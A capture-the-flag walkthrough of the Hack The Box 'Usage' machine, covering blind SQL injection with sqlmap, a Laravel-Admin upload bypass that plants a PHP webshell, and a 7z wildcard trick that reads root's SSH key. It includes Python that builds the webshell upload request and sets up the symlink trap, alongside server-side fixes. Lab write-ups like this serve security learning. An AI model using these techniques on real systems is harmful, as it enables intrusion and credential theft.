In this post, I would like to share a walkthrough of the Usage machine from Hack The Box.
This machine is rated Easy on Hack The Box.
What will you gain from the Usage machine?
For the user flag, you need to abuse a blind SQL injection vulnerability in the password reset form, which I exploited to dump the database and locate the admin login credentials. The admin panel, built with Laravel-Admin, has a vulnerability that allows uploading a PHP webshell as a profile picture by altering the file extension after the client-side validation has already passed.
As for the root flag, you need to explore the box, discover a password in a Monit configuration file, and exploit a wildcard vulnerability in a 7z backup command to read files as the root user.
Information Gathering on Usage Machine
Once we have started the VPN connection (the .ovpn file is downloaded from Hack The Box), we can start.
┌─[darknite@parrot]─[~/Documents/htb/usage]
└──╼ nmap -sV -sC -oA initial 10.10.11.18
# Nmap 7.94SVN scan initiated Fri Aug 9 19:38:38 2024 as: nmap -sV -sC -oA initial 10.10.11.18
Nmap scan report for 10.10.11.18 (10.10.11.18)
Host is up (0.016s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 a0:f8:fd:d3:04:b8:07:a0:63:dd:37:df:d7:ee:ca:78 (ECDSA)
|_ 256 bd:22:f5:28:77:27:fb:65:ba:f6:fd:2f:10:c7:82:8f (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://usage.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Aug 9 19:38:48 2024 -- 1 IP address (1 host up) scanned in 10.27 seconds
┌─[darknite@parrot]─[~/Documents/htb/usage]
└──╼ $
Let’s access the website interface.
However, it redirected us to a login page.
Let’s try to access the dashboard using default credentials, but sadly we cannot get in at all.
The screenshot above shows the request in Burp Suite.
I found a Reset Password form, so let’s see what happens when we submit it.
The request looks something like the one shown above.
Enumerate the MySQL database
When we break the query syntax in the reset form (for example with an unbalanced single quote in the email field), the server answers with an HTTP 500 Internal Server Error instead of the normal response, which points to a blind SQL injection.
Therefore, let’s hand the injection to sqlmap, which identifies it as a time-based blind SQLi.
Using sqlmap we can dump the database, which gives us the admin’s password hash.
As a result, we copy the hash to our attacking machine and crack it.
After a while, the hash cracks to whatever1.
However, we didn’t have any site yet where these credentials would be useful.
Directory brute-forcing turned up nothing either.
Let’s enumerate subdomains with gobuster, but it finds nothing at all.
However, when we switch to ffuf (fuzzing the Host header for virtual hosts), we do find a subdomain.
Accessing that subdomain reveals a new login page.
We notice that the panel reveals its Laravel-Admin version, which we can abuse in the next stage.
After some research, I found CVE-2023-24249, which can be found here.
Therefore, let’s try to exploit it on the website above.
We upload a file containing a simple PHP one-liner as the profile picture, changing its extension to .php in the intercepted request after the client-side check has already passed.
It uploads successfully to the dashboard.
Let’s test the PHP code by executing a command through it, and it works like a charm!
As a result, let’s send the request with our reverse shell payload.
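The upload bypass above works because the only check runs in the browser, on the name the user picked, and never sees the edited request. The following added example (my code, not the author’s and not laravel-admin’s) builds the multipart body the server actually receives with the renamed filename, then shows the server-side check that would have rejected it. The form field name `avatar`, the filenames and the PHP one-liner are assumptions standing in for the profile-picture upload; `PNG_SAMPLE` is a constructed header, not a real image.

```python
"""Upload-extension bypass and the server-side check that stops it.

Added example. Field name, filenames and WEBSHELL are assumptions; PNG_SAMPLE
is constructed (signature plus padding), not a real image.
"""
import os
import secrets
from typing import Optional, Tuple

# A PHP one-liner of the kind uploaded in the walkthrough (assumed payload).
WEBSHELL = b"<?php system($_REQUEST['cmd']); ?>"
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16

ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif"}
# Bytes a genuine file of each type must start with.
MAGIC = {
    b"\x89PNG\r\n\x1a\n": ".png",
    b"\xff\xd8\xff": ".jpg",
    b"GIF87a": ".gif",
    b"GIF89a": ".gif",
}


def client_side_check(filename: str) -> bool:
    """What the browser-side JavaScript does: extension only, on the picked
    name. It is advisory at best; the server never learns whether it ran."""
    return os.path.splitext(filename)[1].lower() in ALLOWED_EXT


def build_multipart(field: str, filename: str, content: bytes,
                    content_type: str = "image/png") -> Tuple[str, bytes]:
    """Build the multipart body the server receives. Changing `filename` here
    is exactly what editing the intercepted request in Burp does."""
    boundary = "----WebKitFormBoundary" + secrets.token_hex(8)
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        f"Content-Type: {content_type}\r\n\r\n"
    ).encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return f"multipart/form-data; boundary={boundary}", head + content + tail


def server_side_check(filename: str, content: bytes) -> bool:
    """The check the panel should do: allow-listed extension AND a matching
    image signature. '.php' fails the first test; PHP bytes named '.jpg'
    fail the second."""
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED_EXT:
        return False
    for magic, magic_ext in MAGIC.items():
        if content.startswith(magic):
            return ext == magic_ext or {ext, magic_ext} == {".jpg", ".jpeg"}
    return False


def stored_name(content: bytes) -> Optional[str]:
    """Never store under the client's name: random name, extension taken from
    the detected signature, so a later rename trick has nothing to work with."""
    for magic, magic_ext in MAGIC.items():
        if content.startswith(magic):
            return secrets.token_hex(16) + magic_ext
    return None


def demo() -> dict:
    """Walk through the bypass and the fix; returns the outcomes for checking."""
    picked = "avatar.jpg"   # name the browser validated
    edited = "avatar.php"   # name after the Burp edit
    _, body = build_multipart("avatar", edited, WEBSHELL)
    return {
        "client_check_passed": client_side_check(picked),
        "request_has_php_name": b'filename="avatar.php"' in body,
        "server_rejects_php_name": not server_side_check(edited, WEBSHELL),
        "server_rejects_php_bytes": not server_side_check(picked, WEBSHELL),
        "server_accepts_real_png": server_side_check("avatar.png", PNG_SAMPLE),
        "stored_png_ext": os.path.splitext(stored_name(PNG_SAMPLE) or "")[1],
        "stored_shell": stored_name(WEBSHELL),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The signature check alone is not enough: a polyglot that starts with a real image header and carries PHP after it passes `startswith`. That is why `stored_name` discards the client’s name and extension entirely, and why uploads should live in a directory the web server is configured never to execute.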
We can read the user flag by typing the “cat user.txt” command
Escalate to Root Privileges Access
We cannot find the privileged binary the normal way (sudo -l prompts for a password) because we don’t have dash’s password.
Eventually, we find a password in the Monit configuration file, but we don’t know which account it belongs to.
There are three users on the box, so we try the password against each of them.
The password works for xander.
With xander’s access we can finally find the binary.
Unfortunately, we cannot recover readable code from the binary.
We can use the command above to grab root’s flag and also root’s SSH key.
Let’s execute the binary and see how it responds.
After a while, we manage to get root’s SSH key and use it for a root shell.
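The root step relies on a 7z feature rather than a bug in the binary: any argument beginning with `@` is read as a list file of paths, so if a root-run `7z … *` expands the wildcard in a directory we control, a file named `@root.txt` next to a symlink `root.txt` makes 7z open the symlink’s target as root and complain about every line in it. The block below is an added example (my code, not the author’s) that plants the two entries and parses 7z’s warnings back into the file contents. It assumes what the walkthrough describes but does not print, namely that the binary runs 7z over a bare `*` in a writable directory; `SAMPLE_7Z_OUTPUT` is constructed, modelled on p7zip’s scan warnings, and contains no real key material.

```python
"""Reading a root-owned file through a wildcard in a root-run 7z command.

Added example. Assumes the sudo binary runs 7z on `*` from a directory we can
write to; SAMPLE_7Z_OUTPUT and all names are constructed.
"""
import os
import re
import tempfile
from typing import List, Tuple


def plant_listfile_trap(workdir: str, target: str,
                        name: str = "root.txt") -> Tuple[str, str]:
    """Create the two entries the shell glob `*` will hand to 7z:
      @<name>  7z treats an argument starting with '@' as a list file of paths
      <name>   a symlink to the root-owned target, so the 'list file' 7z opens
               (as root) is really the file we want to read."""
    listfile = os.path.join(workdir, "@" + name)
    link = os.path.join(workdir, name)
    open(listfile, "w").close()   # contents are irrelevant; the name is the trick
    os.symlink(target, link)
    return listfile, link


# Every 'path' from the list file that does not exist is reported. p7zip prints
# it inline ("WARNING: No more files" then the path on the next line) and again
# in the closing "Scan WARNINGS" summary as "<path> : No more files".
_INLINE = "WARNING: No more files"
_SUMMARY = re.compile(r"^(.*) : No more files$")


def leaked_lines(seven_zip_output: str) -> List[str]:
    """Recover the target file's lines, in order, from 7z's warnings. Inline
    warnings are preferred; the summary is used only if none were found, so a
    file with repeated lines is not silently collapsed."""
    lines = seven_zip_output.splitlines()
    inline = [lines[i + 1] for i, line in enumerate(lines)
              if line.strip() == _INLINE and i + 1 < len(lines)]
    if inline:
        return inline
    return [m.group(1) for m in map(_SUMMARY.match, lines) if m]


# Constructed stand-in for 7z's output when the list file pointed at an SSH
# key. The base64 line is a dummy, not a real key.
SAMPLE_7Z_OUTPUT = """\
Scanning the drive:
WARNING: No more files
-----BEGIN OPENSSH PRIVATE KEY-----
WARNING: No more files
AAAACONSTRUCTEDDUMMYLINEAAAA
WARNING: No more files
-----END OPENSSH PRIVATE KEY-----

0 files, 0 bytes

Scan WARNINGS for files and folders:

-----BEGIN OPENSSH PRIVATE KEY----- : No more files
AAAACONSTRUCTEDDUMMYLINEAAAA : No more files
-----END OPENSSH PRIVATE KEY----- : No more files
----------------
Scan WARNINGS: 3
"""


def demo(target: str = "/root/.ssh/id_rsa") -> dict:
    """Plant the trap in a scratch directory and parse the sample output."""
    with tempfile.TemporaryDirectory() as workdir:
        listfile, link = plant_listfile_trap(workdir, target)
        return {
            "listfile_name": os.path.basename(listfile),
            "link_target": os.readlink(link),
            "glob_hits": sorted(os.listdir(workdir)),   # what `*` expands to
            "leaked": leaked_lines(SAMPLE_7Z_OUTPUT),
        }


if __name__ == "__main__":
    result = demo()
    print(result["glob_hits"])
    print("\n".join(result["leaked"]))
```

Two caveats: the glob must be unquoted and run in the directory where the trap sits (a `*` does not match dotfiles, but `@root.txt` is not a dotfile), and the lines come back as warnings, so a multi-line key must be reassembled in order, which is what `leaked_lines` preserves. The fix is not a 7z option but the sudo rule: never let an unprivileged user control the working directory or arguments of a root-run command that expands a wildcard.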
We can read the root flag by typing the “cat root.txt” command